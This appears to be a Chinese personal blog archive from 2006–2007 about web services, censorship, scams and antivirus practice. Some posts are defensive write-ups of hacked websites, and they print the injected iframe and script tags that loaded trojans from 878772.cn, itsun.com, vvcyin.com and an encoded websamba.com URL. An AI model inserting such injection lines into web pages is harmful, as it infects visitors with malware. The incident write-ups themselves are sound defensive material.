花儿象幸福一样's profile十二棵橡樹BlogListsGuestbookMore ![]() | Help |
|
|
9/12/2007 "资深网民"的标志网络上有这么一些人,特别是IT圈的某些人,往往都有这些标志,或许才可以代表着网络潮流: 1、一个Gmail 2、一个Firefox浏览器 3、一个del.icio.us 4、一个flickr 身份而自豪 。5、一个twitter 6、一个豆瓣 ,作为国内web2.0的模范,拥有一个豆瓣,意味着你也是国内web2.0的潮流领先者,意味着你也有读书听音乐的风雅情调,并且愿意与同仁们分享你的情趣。这些大体是当前国内“资深网民”或者IT精英们必备的身份标志了。当然这些人中的更"这些"的人,可能还有一定得用wordpress建的博客,用卡巴斯基杀毒软件,用bloglines阅读网上的文章,使用tor访问维基百科…… ——你是这些人么? 8/16/2007 Twitter用户使用守则![]() 现在据说twitter很是火,随着国内IT大户QQ仿制twitter推出了滔滔(taotao.com)以后,国内的twitter们的竞争越来越激烈了。不过我认为国内twitter中最好的应该是叽歪.de了,其他名气和口碑还行的有“饭否”等。这里是六个Twitter中文克隆版功能对比表供参考,不过这个已经跟不上形势了,现在还出了豆瓣的广播、爱唠叨……几个后起之秀。 喜欢上twitter,还激活了我使用Gtalk的热情,因为原来Gtalk的好友不多,现在有个twitter,这样我就可以随时通过Gtalk使用twitter了,两个捆绑的如此之好,简直让人怀疑twitter是不是有心思等着以后被Google收购。 通过几个月的使用twitter,下面说说使用twitter(以及国内的twitter们)的几个用户应该遵守的规矩: 1、不要无病呻吟。虽然twitter以及国内twitter们的允许你随便说些什么,比如“吃饭咯”,“困了,睡觉了”,“ 下了一天的雨”……等等无聊无味的话,但是要知道随着使用时间的增加,一旦你有了个N个 Followers(跟随者)的话,那么你说的这些无聊的话对于他们无疑是折磨,或者突如其来的手机短信,或者突然蹦出的IM对话框……我就不堪忍受,先是在twitter中设置了加长了睡觉免打扰时间,后来干脆关闭了手机功能。但还是不能忍受上班的时候Gtalk的弹出的消息框,只好将某人remove了。因为twitter的社会化功能,所以您说的话不仅仅是自言自语,而还要考虑到别人的感受,至少他们根本不愿意接受无滋无味的“信”骚扰。除非她是您的亲密家属。 2、不要发炎频率过多。一天偶然接到朋友的twitter消息,如果也很有趣的话,也是件开心的事情。但是如果好友过多,每个人都频率过多,那么恐怕您就无暇做别的事情了,如果您还开通了手机接受,那么您手机就要爆了。同样道理,为了别人的感受,请节制“信”欲。 3、不要跟GOV唱反调。国外的twitter还好,没人管的了,没人会删你的感言或者粪言。但是会被GFW,比如不幸的zuola。国内的twitter们现在还不知道会不会有网管设置过滤关键字,或者删贴,或者其他的手段,但估计以后会象BBS、blog一样被管制、备案(好像没在叽歪.de看见备案证书??)。同样的道理,为了保证这些网站能河蟹发展,即使不违反一个中心两个基本点四个基本原则,不反革命,不迷信,不色情……也不要随便说,其实说什么不该说什么,关键只有一句话:为了河蟹,不要跟GOV唱反调,比如“操你妈的北京,奥你妈的运!”。 8/1/2007 关于木马978772.cn分析及解决方法时间: 2007年7月27日星期五下午16点——18点。 症状: 当日16点左右网站和监管系统页面被嵌入 <iframe src='http://878772.cn/arp.htm' width=0 height=0></iframe> 同时症状显示调用该网站的两个JS脚本。 同时,同事发现局域网有arp攻击现象,显示为192.168.1.111机子在发送伪装arp欺骗包。 18点左右,木马症状消失。 检查: 在服务器上找特定文件,如网站后台登录页面: Admin_login.asp 1、在浏览器中源代码有 “<iframe src='http://878772.cn/arp.htm' width=0 height=0></iframe>”,但查看服务器上该文件没有该添加内容。 2、但admin/Admin_login.asp发现另一可疑内容:../iimages/……/.jss,但是未发现有“iimages”文件夹。这个可能是以前网站中马遗留下来的代码 已删除。 由于木马是当日16点左右出现,按时间查询,其他未发现网站asp、js等文件页面有改动迹象。 措施: 1、恢复网站文件备份; 2、打开网站防SQL注入功能开关。 分析: 1、该木马症状的奇怪处在于虽然发现页面有添加木马网站的调用链接,但未发现页面有添加代码的改动迹象。 2、由于同时发现我们局域网有arp攻击,后来在网上查询有说: “如果是在局域网中,只要局域网中一台电脑中招其他电脑一上网就会连那个网站下载木马。昨天就处理了一个,原来是局域网中一个用户电脑裸奔,杀毒软件没升 级,系统补丁也没打,360安全卫士也没升级,气死了,结果中招。导致局域网中其他电脑受牵连。那台电脑中招后下载了N中木马,还有改卡巴斯基时间的真是 可恶!!” “自动在每个网页上加了这么一段: [color=Red]DoyouQihoo?ramesrc='http://878772.cn/arp.htm'width=0height=0></i-frame-X> [/color]” 局域网中毒机器会有: “好像在系统盘还释放了more.exe和x:\windows\more\....等几个病毒。” 3、局域网中某台电脑中了木马,造成局域网内的ARP欺骗,使得浏览网页时会自动在页面顶部加入 iframe 代码。 4、木马症状消失的原因,自然是局域网内中毒的那台机子关机下班了。 5、 域名:878772.cn 域名状态::ok 域名联系人:李想 管理联系人电子邮件:jiuqiwuyejfja@163.com jiuqiwuyejfja@163.com 所属注册商:北京新网数码信息技术有限公司 域名服务器:ns1.esindns.cn 域名服务器:ns2.esindns.cn 注册日期:2007-06-14 02:27 过期日期:2008-06-14 02:27 IP是60.190.223.103 真正的连接到外部的IP是美国的一个地址: 74.208.78.135 解决方法: 1、目前有效的办法就是局域网内机子安装antiarp和WindowsXP-KB925902-x86-CHS.exe补丁; 2、查找局域网内显示IP为192.168.1.111的机子,查杀病毒。 3、将域名:878772.cn、IP:60.190.223.103添加到浏览器“受限制站点”和hosts文件中(写法:127.0.0.1 878772.cn)。 小结: 这是挂马技术的新动向,从通过图片上传漏洞直接上传木马文件到通过SQL注入漏洞改写网站页面,添加script或iframe链接到外部木马网站,到现在利用局域网arp漏洞,导致局域网内浏览任何网站都被自动在页面顶部加入 iframe 代码。这样安全性能不高的机子就会中招。 7/19/2007 成功注册两个@live.com的邮箱!Google的Gmail邮箱当年以Google的非凡声誉以及其独特的邀请方式,赢得了世人广泛的兴趣,人人都以能得到一个Gmail邮箱而自豪,网上到处都是“谁能给我个Gmail邀请啊?”和获得Gmail的秘笈、攻略。(现在Gmail已经开放注册了。 加入Gmail) 而微软的hotmail想当年可是世界上第一邮箱啊!可是现在早已雄风不在,要不是MSN用户,怕是很少有人再用hotmail了。 现在微软把他的网络服务都改成了Live,MSN空间也叫作Live 空间了。 hotmail邮箱怎么办呢?怎么没有升级到live邮箱?那么这个@live.com邮箱有么? 其实是有的,今天我就注册了两个live的邮箱,其中一个跟我hotmail邮箱对应:shoun_wang@live.com 呵呵,Google当年邮箱玩“邀请”,微软的新邮箱现在就玩“神秘”!! 这里就是秘密注册@live.com邮箱的秘笈!不过是英文的,中文应该是: 1. 访问Hotmail.com,点击Sign UP 2. 这时出现@hotmail.com后缀的Email地址 3. 修改地址栏中的地址hmnewuser.aspx为newuser.aspx,并删除后面的&hm=1字符 4. @hotmail.com就变成@live.com了 注意,页面必须是在英文状态,才可以是live.com,如果页面是中文的,只能注册live.cn了, 要将页面换成英文,需要将地址栏中的zh-cn改写成en-us,如: https://signup.live.com/hmnewuser.aspx?mkt=en-us&revipc=CN&ts=3968927&sh=gHlp&hm=1&ru=http%3a%2f%2fmail.live.com%2f%3fnewuser%3dyes&rx=http%3a%2f%2fget.live.com%2fmail%2foverview&rollrs=04&lic=1 改成: https://signup.live.com/newuser.aspx?mkt=en-us&revipc=CN&ts=3968927&sh=gHlp&ru=http%3a%2f%2fmail.live.com%2f%3fnewuser%3dyes&rx=http%3a%2f%2fget.live.com%2fmail%2foverview&rollrs=04&lic=1 这样就行了。注意,你直接点击我这个“有效地址”是没有用的,因为其中很多是随机码,必须按照正确的申请步骤进去,才可以。 要是还不行,可以将浏览器的默认语言改成“美式英文”(en-us),这样进http://hotmail.com,就是英文界面了,然后进去申请,修改地址栏中参数即可。 7/18/2007 用Google做时间管理![]() 看了月光关于时间管理的介绍,我把我的Google个性化主页也改了,并且采用了时间“四象限”法这个据说是目前很时髦的一种时间管理理论,把工作按照重要和紧急两个不同的程度进行了划分,基本上可以分为四个“象限”:既紧急又重要(如领导临时叮嘱的重要任务、系统或服务器故障等)、重要但不紧急 (如制定规划、制订方案等)、紧急但不重要(如客户电话、技术咨询等)、既不紧急也不重要(如看新闻、写博客、看RSS订阅信息 等)。 重要紧急的事马上做,而这个“四象限”的时间管理理论的的重点是把主要的精力和时间集中地放在处理重要但不紧急的工作上,这类事情的效益是中长期的。 我的Google主页上还放了一个日历,三个便签纸,还有一个“Words of Christ”(耶稣语录),呵呵,这个很酷!每天可以更新看到圣经的一些段落,权当每日读经了,不过这个在中文版的iGoogle中好像没找到,可以切换到英文版igoogle中添加进来。 不过网上关于时间管理的居然有五花八门的软件,看这个,GTD软件工具列表,还有这个,十大免费和便宜的时间管理工具。 没“时间”用过那么多工具,个人觉得 Google书签,以及4/26/2007 使用动易系统的网站被挂木马事件一、情况报告: 2007年4月26日早上通过firefox浏览器的"NoScript"插件发现网站躲多了两个奇怪的网 站:"itsun.com"和"vvcyin.com"以及一个"%77%77%77%33%38%2E%77%65%62%73%61%6D %62%61%2E%63%6F%6D/%64%75%63%6B%39%39/%67%6F%6F%67%6C%65/%64%6F %77%6E.js"(即:"http://www38.websamba.com/duck99/google/down.js")的奇怪链接。 因此可以证实网站已经被挂马了,就是说,网站的页面被一些人多加了一些脚本,链到上面三个链接网址,加载上面三个网址中的木马程序,从而访问我们网站的 人,都有可能感染木马。 二、页面添加的代码: 网站根目录下的所有htm、asp、js、as等文件都被添加了"木马"代码,一般如下: 1、<script language="JavaScript" charset="gb2312" type="text/ javascript" src="http://www8.itsun.com/count.php? uuid=1720554&style=none"></script> 2、<script id="advjs" src="http://w.vvcyin.com/adv.js? showmatrix_num=055"></script> 还有一个asp文件是: 3、<script language="JavaScript" src="http://%77%77%77%33%38%2E %77%65%62%73%61%6D%62%61%2E%63%6F%6D/%64%75%63%6B%39%39/%67%6F%6F%67%6C %65/%64%6F%77%6E.js"></script> 这是经过加密编码的,即木马网址:http://www38.websamba.com/duck99/google/down.js 三、木马网站: 所以我们看到了三个木马网站地址: itsun.com vvcyin.com websamba.com 所以为了安全起见,我们建议将这三个网址添加到IE浏览器的:"工具/indtrnet选现/安全/受限制站点"里。 并且可以在C:\WINDOWS\system32\drivers\etc\,用记事本打开hosts文件 添加如下: 127.0.0.1 itsun.com/ 127.0.0.1 vvcyin.com/ 127.0.0.1 websamba.com 然后将hosts文件设为只读。 四、查杀网站木马过程: 1、按时间查:在网站服务器的网站根目录下按时间查找文件, 时间出来了:2007年4月25日18:45分 这是大量页面被更改的时间,也就是页面被挂马的时间。 2、扩展名为jpg/gif的木马检查方法: 在资源管理器中使用详细资料方式,按类别查看。点"查看"菜单--"选择详细信息"--勾选上"尺寸",确定。此时,正常的图片文件会显示出图片的尺寸 大小,没有没有显示,则99%可以肯定是木马文件。用记事本程序打开即可100%确定。 五、手工删除木马代码: 打包下载所有被更改的页面,大约8M文件, 用dreamweaver、visual studio等编辑软件中"编辑/查找替换",选查找范围为文件夹,选择下载的解压文件包路径,查找上面提到 的木马代码和木马地址,全部替换成空格。 OK,2600多个文件被添加的木马代码被手工删除了。 上传被剔除木马代码的文件,覆盖服务器上原文件。 六、打补丁: 从网上搜索来看,目前已有数千家恶意网站(如前面提到的 websamba.com等)利用微软MS06-014和MS07-017两大漏洞挂马,上千 万网民受害,MS07-017成为国内常用网站挂马漏洞第二,与"挂马王"MS06-014二者之和占到总体比例的97%-98%。 还有利用Win2003存在着一个Windows 2003 IIS6的文件解析路径的缺陷。 (介绍文章:http://www.72e.net/host/special.aspx) 动易系统的补丁下载:http://www.powereasy.net.cn/Soft/PE_Plus/228.html Microsoft 安全公告 MS07-017: http://www.microsoft.com/china/technet/security/bulletin/MS07-017.mspx 3/15/2007 我们的网站被挂马了3月7日上午9点多,我用firefox打开我们的网站的时候,发现NoScript插件中屏蔽了一个奇怪的东西: “http://%77%77%77%33%32%2E%77%65%62%73%61%6D%62%61%2E%63%6F%6D/%64%75%63%6B%36%36/%62%61%69%64%75/%64%6F%77%6E.js”, 这是我们网站原来没有的啊,再用IE打开我们的网站的时候,发现IE的增强安全组件蹦出来一个窗口,是否允许一个“http://www32.websamba.com”的网站,这也就是说,在我的网站上多了个JavaScript脚本,指向的应该是“www32.websamba.com”网站! 分析了一下我们网站代码,被种植木马的是在img.asp,原来是被加了这样一段脚本代码: ========================================== ![]() ================================================== 即脚本来自:http://www32.websamba.com/duck66/baidu/down.js (警告:没有安装安全组件的浏览器,不要试图打开!) 网上搜了一下,是个病毒名为Win32:Qqrob-BN [Trj]的木马程序。 这个木马在我们网站上,我按照最近更改时间搜索(2007年3月6日17:22,这个应该是木马种植的时间),找到了这个木马,可惜我将它下载下来后,没来得及分析,就给我机子的Kaspersky 给清除了! F:\***\bbs\INC\globalsa.asp 删除 Backdoor.ASP.Rootkit.b (Kaspersky报告) 可惜可惜!从木马种植的网站文件来看,可能是利用网站后台的图片上传漏洞放进去的。 据说这个木马也是最近很流行的,从网上搜的结果看,这个木马大约是跟游戏帐号、QQ等盗号或者刷站有关。 在没有安全组件的个人电脑的浏览器上,如果访问这个被挂马的网站,默认将会执行这个网站上的任何脚本程序,也就是说将会中招! 所以推荐使用Firefox浏览器(下载:http://www.mozilla.org.cn/),并安装NoScript插件,这样会更安全。 如果使用IE浏览器,最好也要安装一下增强安全组件,不过安装了安全组件的IE,看网站比较烦人,访问任何一个网站都会弹出一个安全确认框,除非你把网站设为安全,不过对于一般人来说,根本无从判别网站是否安全。所以不推荐使用IE。 中招了怎么办?看这里。 3/14/2007 MSN名字上的i'm图标以前也见过关于 ![]() 虽然其他国家的MSN用户并不能给这些慈善组织增加捐款,但也算表了一下美好的愿望。 我是在我的MSN名字前加的是*wwf,即你会看到我的名字是: 嗯,看到我博客的朋友都可以加入 附:各慈善组织实名及代码: 目前受赠机构包括: American Red Cross(美国红十字会,特定码*red+u)、 Boys &GirlsClub(儿童群益会,特定码*bgca)、 National AIDSFund(美国国家爱滋基金,特定码*naf)、 NationalMultipleSclerosisSociety(国家多发性硬化症学会,特 定码*mssoc)、 ninemillion.org(国际儿童难民援助组织,特定码*9mil)、 SierraClub山峦协会(保护自然生态的地球环 境协会,特定码*sierra)、 StopGlobalWarming.org(防止全球温室效应恶化的机构,特定码*help)、 SusanG. Komen for the Cure(乳癌基金会,特定码*komen) 、 The US fundforUNICEF(美国地区联合国儿童基金会,特定码*unicef)、 World Wildlife FundforNature(世界自然基金会,特定码*wwf)、 The Oxford Committee for FamineRelief(乐施会;协助解决当时世界各地饥荒及贫穷问题,特定码*oxfam)、 国际关怀协会(特定码*care)、 TheHumaneSociety of the United States(美国人道协会,特定码*hsus)、 AmericanCancerSociety(美国癌症协会,特定码*acs)、 ONECampaign-(全球消除贫困与对抗爱滋的组织(GCAP),特定码*one) 2/27/2007 一个产品的团队就像一个乐队我们的网站本来今年年初就要上线的,可以一直拖拖拉拉,现在还遥遥无期,其实也罢,上不上也无所谓,实际上所谓的改版“新网站”,以我看,至少倒退了10年,实在让人心灰意冷。 当然,网站变成这样,或者将要变成这样惨,原因是很多的,领导归结为执行力的问题,我看这是网站改版从规划到设计,到执行,是整个团队协同的问题,或者直接点,是团队协同出现真空,没有按照正常的、科学的流程走,出现许多莫名其妙的干扰。 团队中的专业人员不被信任,而网站UI设计的决定权反而在并不懂行的BOSS把持,这是一件很痛苦很无奈的事情。 白鸦在他的blog中说:“如果老板一定要总是决定UE设计,那么是这个老板有病;如果是其他角色成员要总是决定UE设计,那么这些人大概也有心理问题。”; “一个产品的团队就像一个乐队,吹喇叭的就管喇叭,打鼓的就管鼓;就算是乐队指挥也总不能自己去吹喇叭吧。 所以各角色还是应该自己决定自己在整体节奏下自己应该奏出的音符”, “其他部门可以去做UED,但不能总去把控UED设计的所有决定权,否则就一定是不合理的。” 所以还是那句话,把专业的事交给专业的人去做,然后专心做自己专业的事。 如果你非得去作自己不专业的事,那么你最好去请教专业的人帮你拿主意; 如果你请他们拿了你自己都认为合理的主意后,你还是想让他们改听你的那个错误主意,那么你的脑袋里估计长了很多叫”自负”的蛆虫。 自负不好,过分自负会毁掉自己;认为所有伙伴都必须要听自己,轻视伙伴的存在,会毁掉整个团队。团队之间需要的是协作,协作不是简单的一个人要听另一个人或一个角色要听另一个角色的。 在白鸦的blog里还有一些关于“为什么设计师要拿出两套方案?”的讨论,也很有意思,其实就是设计师是究竟应该对BOSS负责还是对设计负责的问题。 “这个问题实在是太敏感。不仅是UE这个职位存在这样的问题,很多职位都存在同样的问题。 问题的关键是你想如何去做? 如果你希望能够控制UE的决定,那就需要去争取,去证明自己够实力够专业(但又不能表现出比自负的BOSS更实力更专业?)。只有获得认可的前提下,才可能得到授权。” 设计也罢,管理也罢,军事也罢,其实都是遗憾,历史表明,很多时候,只有时间可以证明一切。 2/12/2007 从“熊猫烧香”到我的防毒必杀技!![]() 这个可爱的图标如果你不熟悉,那么要恭喜你了,那么我要祝福你新年快乐,万事大吉!但是如果这个图标你很熟悉,那么更要恭喜你了!因为你可能中了当今世界上最流行的病毒!最时髦的病毒!呵呵,——著名的“熊猫烧香”病毒。——这个现在已经闹得谈猫色变的病毒。 我初次见到它,应该算是我有幸,从一个同事的机子上见过,但是只是奇怪,她桌面上得一些图标变成这个样子,开始只是以为是文件关联的问题而已,不是什么大不了的事。 在流氓软件肆冽的年代,一般要解决人家电脑中莫名其妙问题,当然习惯在安全模式下进去,安装360安全卫士或者瑞星卡卡3.0这两个目前比较好用的杀流氓软件的工具,杀一下试一试,而以前我一般喜欢用HijackThis这个工具来解决。杀完重启,看看问题如何,否则只有再装杀毒软件试一试了(其实这台机子已经装了瑞星杀毒软件,不过对于国内的杀毒软件,我一贯不信任)。 我把正版的卡巴斯基6.0安全套装光盘插进去……奇怪了?居然点击setup.exe居然安装不了?光盘坏了?还是光驱问题?还是有病毒进程屏蔽了卡巴司基运行程序?因为这个情况我遇到过,以前给另一个同事装过卡巴司基服务器版的,但是奇怪的是虽然能安装,而且病毒库升级程序也可以正常升级,但是病毒库内核文件始终被屏蔽住,使得病毒监控程序无法加载。 幸好这是台新机子,没怎么用过,所以最后我的必杀技就是全盘格式化,分区重装系统。 经人指点,终于知道原来这就是大名鼎鼎的“熊猫烧香”病毒!! 现在在网上可以很方便地找到一些专杀工具了,据说尤其以这个最好,不但这个在《超级巡警》中的这个工具推出时间较早,而且从他们的网站来看,安全工具很少,只有2、3个,所以给人感觉《超级巡警》就是为了“熊猫烧香”而出来的,更有人怀疑他就是“熊猫烧香”的幕后推手。同样的例子是,现在很火的360安全卫士由于老板就是原著名流氓软件3721的老板,所以现在也常被猜疑是玩一边造病毒和流氓软件,一边更好地推销自己的杀毒软件的把戏。 吃一堑长一智,由于“.exe”文件是最容易被病毒感染的,而我以前也中过病毒,虽然病毒能给杀毒软件清除,但结果是致使我的一些收藏多年的exe的电子书都打不开了。所以我常常将自己收藏的一些exe的文件,如电子书、装机软件等或者打包压缩保存,或者设置成“只读”形式,以防感染。 不过从公布的熊猫烧香的源代码中,我发现居然它有解除“只读”的本事!!强! 百年大计,预防为主,所以为了避免自己的好东西再被染毒,我想出了一个高招,也郑重向大家推荐: 方法是: 1、只读。将重要文件设置为只读文件,这个的方法可以预防大多数病毒; 2、压缩包,通过压缩计算后,压缩文件往往也不容易被病毒感染,而且节约保存空间,所以不常用的东西我都压缩保存起来; 3、这就是我说的绝招!——更改扩展名!当然命名规则自己得清楚了。改了扩展名,除了自己,病毒和系统以及其他人没有一个认识了!嘿嘿! 顺便说一下,这个方法同样可以一定程度上适用于保密自己的一些私密东西,比如在公司下载的一些小电影什么的,呵呵~ 嗯,最简单的命名方法,我一般用扩展名尾数重复的方法,比如exe=exee,doc=docc……简单一些,但预防病毒就足够了。 P.S.1.补充一下,有时候病毒和木马也会通过改扩展名的形式让你中标!!比如网上人家QQ给你一个jpg的图片,但岂不知其实这是个exe文件!! P.S.2有人觉得不怕病毒,常用程序和系统都装在C盘,然后做一个ghost盘,就万事大吉了,但这样并不保险,已知熊猫烧香变种可以删除ghost的备份gho文件!! P.S.3刚刚QQ弹出消息,熊猫烧香的作者“武汉男孩”逮到了!!!谢天谢地!! 7/11/2006 我的“俄罗斯艳遇” 怎么样?这个是来自俄罗斯喀山的MM哦,她说她要嫁给我哦,不要羡慕哦~哈哈~
这个俄罗斯MM艳遇在Myspace,通信了2个月,哎,已经非我不嫁了!
唉~虽然难看点,但好歹是个洋妞啊!以后我这也算是有海外关系了,将来孩子上大学什么的也许还有加分啊~将来。。。。。。哈哈~气刹朱夫子了,“网上自有颜如玉,SNS自有黄金屋”啊!
但是,maybe it's magic?幸福也TMD来的太容易了吧?
终于发现了MM原来是“小倩”!
“尾巴NO.1”:不问我的来历,只说她自己的生活状态、恋爱史;
“尾巴NO.2”:终于后来问你要钱了!虽然数目不多,但这才是骗子永远不变的主题啊!
“尾巴NO.3”:张冠李戴。在给我的一个"love letter"中出现"dear Road"的陌生名字?"Road"是who?
网上无意发现一个Indy Gump's photos,里面居然就有这个名叫Maria Kozlova的相片!不过在她名字后面还有个触目惊心的字:"SCAM”!
继续寻找就容易了,她的详细档案资料呈现出来:
# Name: Maria Kozlova # E-mail: maria2005@nm.ru # Address: Russia, Kazan, 78 Lenina St Apt 60 # Details: She wrote me that she is an economist, working as a cook, and donates much of her salary to an orphan home.
这是在一个反邮购订单新娘诈欺, 国际婚姻诈欺, 俄国妇女诈欺的网站找到的信息,我相信那个叫"Road Wang”的中国男子也在同时被这个叫Maria的俄国scammers欺诈!
无独有偶,我还接到过自称是招商银行的电话服务,“为了用户安全”,她需要你提供用户信息以便确认,比如需要你提供你的生日、你的注册电话等等。虽然最后证实这个电话的确是招商银行打的,但有没有想过这可能也是欺诈呢?你的个人信息甚至密码很可能就会被轻易的给别人拿去!这在网上有个名字叫:“网络钓鱼”或者“电话钓鱼”。
6/9/2006 6月9日,Google首日祭今天google将他的"谷歌"两个汉字在他的http://www.google.com和http://www.google.com/intl/zh-CN/ 常规首页上去掉了,换成“中文(简体)”字样:
之前也有部分人发现:“GOOGLE,这个图标,G下半部分是一个XX,LE是一个XX,无法显示.怎么刷新都无法显示.这是从来没有出现过的状况.”即是表明google在换图标。
中国外交部发言人刘建超本周四(2006年6月9日)在例行记者会上表示:
“中国政府对与Google等公司在信息领域开展合作持积极态度,但任何经贸合作都要在法律框架内进行。我们希望有关公司在中国发展业务时能够遵守中国的法律。” 刘建超的发言实际上等于承认,屏蔽Google这件事儿,就是我们干的,因为Google没有遵守中国的法律。但中国发言人永远都不会明确告诉老外, Google违反的是哪条法律,屏蔽行为又是依据何种法律。老外一般都希望根据明确的可遵循的法律条文从事经营活动,但在中国,很多行为就像禅宗一样不可言说。除了理念上的冲突,要想悟得中国之道,时间恐怕也是必须支付的成本。(keso语) 但是,本周Google似乎对自己在中国的策略有些不确定。赛吉-布林表示,在决定改变策略之前,Google还会继续完善当前的自我审查制度。如果实在无法找到一个平衡点,那么Google将另作打算。
网上纷纷传言google将退出中国。不晓得今天将“谷歌”两个汉字去掉,意味着什么…… 6/7/2006 没有Gmail的日子~5/26/2006 被封网站列表 才发现http://www.technorati.com/(世界著名的博客搜索引擎,被誉为是博客中的google)也被封了,甚是郁闷~
(Technorati.com立照存念)
先简单统计了一下已经被GFW封锁的网站,以后慢慢再补充: http://www.technorati.com (世界最著名的博客搜索引擎) http://blogspot.com (世界最大的博客服务BSP,google旗下) http://wikipedia.org (维基百科) http://wordpress.com (最著名的开源博客程序及其BSP服务) http://www.tblog.com/ (国外的博客服务BSP) 生活就像被强奸,如果无法反抗,那就只有默默地享受了。所以我也欣喜地享受到有些网站被解禁了: http://www.weblogs.us (国外的博客服务BSP) 2/8/2006 2005年中国最酷的5个网站[转] 我的5个最酷的网站榜单如下(排名不怎么分先后):
豆瓣(douban.com) 我和xdanger的第一反应,2005年最酷的网站,豆瓣当之无愧。 缺点:豆瓣的部分灵感来自flickr,所以它和flickr一样有个小缺点一直没有解决,缺少了对Trackback的支持。和Blog之间少了一种联系渠道,不爽…… PS. 我记得豆瓣首页的title是“豆瓣评论”,很酷,可惜最近发现变了…… 比较讨厌SEO用的title。 SeeHaHa(seehaha.com) 托Flash技术的福,SeeHaHa大大降低了Podcast的制作成本,老奶奶也可以做播客咯。 和Seehaha类似的,土豆也是非常优秀的podcast网站,但是土豆的界面不如SeeHaHa简洁,视频则从来没有在我的Firefox中播放成功过…… 只好放弃了。(同样因此而落榜的还有FeedSky) 缺点:作为一个Podcast网站,SeeHaHa却没有提供视频下载,也无法通过其他podcast软件订阅,不得不说是一个遗憾 客齐集社区(bbs.kijiji.com.cn) 不知道该夸Livid的设计天赋,建硕的慧眼识才,还是客齐集团队的整理创意。客齐集社区给老套的论坛带来了全新的面貌和另类(发帖扣钱)的金融系统。 问题:程序和系统再好,也只是社区的骨架。如何聚集人气,如何管理社区,是bbs.kijiji.com.cn将面对的最大挑战。 乐铺(loopo.cn) 感谢avenger,感谢他在一周前建立了loopo.cn网站,可以让我的榜单中有更多的内容。简单明晰的界面,blog,RSS,Tag,AJAX(你可以直接把商品拖到购物车中),再看看TodoList:Trackback、自定义Tag、用户中心…… 酷!一个用几个礼拜完成的夫妻老婆店,变成了互联网新技术的演示站(所谓网店2.0?)。怪不得建站当天就有VC和avenger接触了。 问题:loopo可以很容易成为最酷的网上商店,却几乎没有机会做大,对网上商店来说,网站只是很小的一个部分。也许avenger根本不想做大,不过有机会的话也不应该放过(ShopEx的裴大鹏貌似很想拉avenger入伙,开他个百万年薪外加股份,呵呵) BlogBus(blogbus.com) 2005年中国的Blog界那么的浮躁,blogbus却仍然专注于做专业Blog服务提供商,这一点大大提高了老横在本人心目中的形象(虽然他借此软磨硬泡把我的服务器骗进了他的机房)。哪个BSP最酷,看首页就知道了! 问题:豆瓣的阿北、客齐集的Livid、乐铺的avenger,都是中国最顶尖的程序员,SeeHaHa的痒痒虽然未曾谋面,但从他的网站来看,对Flash的应用也是异常的色。与之相比BlogBus在技术上缺少亮点。 1/17/2006 2005年最酷的5个网络服务年终毫无例外的是盘点与展望的时间,所以还没真正到年底,就已经有不少人在忙不迭的盘点着各种的年终排行榜。有关web2.0的排行榜,现在比较流行的是这个Best Web2.0 Software of 2005(中文版)。我也来清理一下2005年给我印象最深的最酷的几个网络服务,或者说web2.0网站。 1、Douban:已经记不清是从哪里开始,很偶然地注册成为豆瓣的第53位用户,从此成为豆瓣的最忠实用户之一(用豆瓣词典里的术语叫做“豆粉”)。豆瓣令我耳目一新的网站设计与用户友好性、易用性,使它成为我使用最多的网络服务之一。同时,也很期待说英语的Douban在2006年也能够在国外成为热门词之一。 2、del.icio.us:和这个现在非常知名的网站邂逅过几次,但都因为这个怪异的域名以及丑陋的页面而擦肩而过,终于有一天想注册成用户看看这个得到不少人美誉的网站究竟有什么用,del.icio.us就这样让我品尝到它的美味,而成为我每天网络生活的一部分,至今为止为在del.icio.us中记录了1200多条书签,希望Yahoo在2006年能够善待它,不要让我失望。 3、Technorati:与Flickr及美味书签一样,Technorati也为Tag的推广作出了巨大的贡献,尽管现在距离Tag的真正普及还有很长的距离。 Techonrati尽管还有一些自己的问题,但作为目前最优秀的Blog搜索引擎,是我目前搜索Blog的反向链接以及进行Blog内容检索的最主要工具。不知道Technorati在2006年是否也难逃被收购的命运。 4、Memeorandum:如果说链接是Blog的重要特性和价值之一,Memeorandum这个名字拗口的网站就是挖掘和揭示Blog链接价值的最出色的服务,它通过聚合相关的 Blog讨论内容(其实也包括传统主流媒体的内容)让Blog真正成为一种对话,使Blog不再是孤岛。在Memeorandum出现之前我没有想到能够这样创意地组织Blog的内容进行展示,我想Memeorandum的价值不仅仅在于Blog,它对于未来的网络媒体内容组织形式同样具有深远的意义,只是似乎国内对这个网站的重视程度不是太高。Technorati的后厨房现在正在打造自己的一款类似于Memeorandum的服务Techonrati Explore。 5、43things:虽然43things是这5个网络服务中我使用得最少也已经很久没有登录使用的服务,但它已让给我留下深刻的印象,43things所带来的独特的目标分享方式启发了我对于社会性网络的一些思路,而43things事实上也启发了很多SNS从业者。 我的5个候选名单:优秀的网络服务的确太多了,实在忍不住要提提下面这5个服务作为候选(说白了,其实是十大,呵呵):Feedburner,Pandora,SeeHaha,Ning,Squidoo。 说完了我自己的选择,学习一下怪癖游戏,点名请下面几位blogger谈谈自己印象中2005年最酷的5个网络服务:Keso、Webleon、zheng、 Hopesome、Herock,欢迎大家也都说说自己心目中最酷的网络服务,也算是一个年终盘点的游戏吧。
http://in.comengo.net/index.php/page/2/
2005年最酷的5大软件盘点完5大网络服务,继续盘点2005年我最喜欢的5大软件,继续我的年终回顾与展望专题系列。 1、WordPress: 自从今年4月开始写作这个blog以来,WordPress成为我几乎每天都会使用到的软件,而WordPress也的确在今年取得了迅速的增长,成为继 MT之后的另一个最受欢迎的blog系统,它方便易用的特性以及众多的插件系统使得很多人在建立独立的Blog空间时首选的就是WordPress。 Alex Huang正在写一系列详细的WordPress使用指南,很不错的新手指南。 2、FireFox:不要笑话我落伍,我是到今年才开始正式转向使用Firefox的,之前用的是Maxthon,因为喜欢Maxthon的一些功能与使用习惯,比如Tab浏览,鼠标拖曳、手势,但使用Firefox之后很快就喜欢上这个软件了,终于全面转向Firefox,而且相比较Maxthon,我更喜欢FF可自由组合的Tab方式以及Adblock等等丰富而实用的插件(有空写篇我最喜欢的Firefox插件,呵呵),而且FF1.5的稳定性也已经很不错了。 3、GreatNews:虽然很多人都喜欢用在线RSS阅读器,但我还是更偏爱客户端工具,以前用的是D版的FeedDemon,直到遇到GreatNews,它优秀的界面表现、速度与操作习惯让我很快就抛弃了FeedDemon。我相信习惯使用客户端阅读器的人都会喜欢上GreatNews的,何况它还可以与Bloglines实现同步。 4、GTalk:我使用它只有一个最重要的原因:简洁,但能满足我的基本需要。 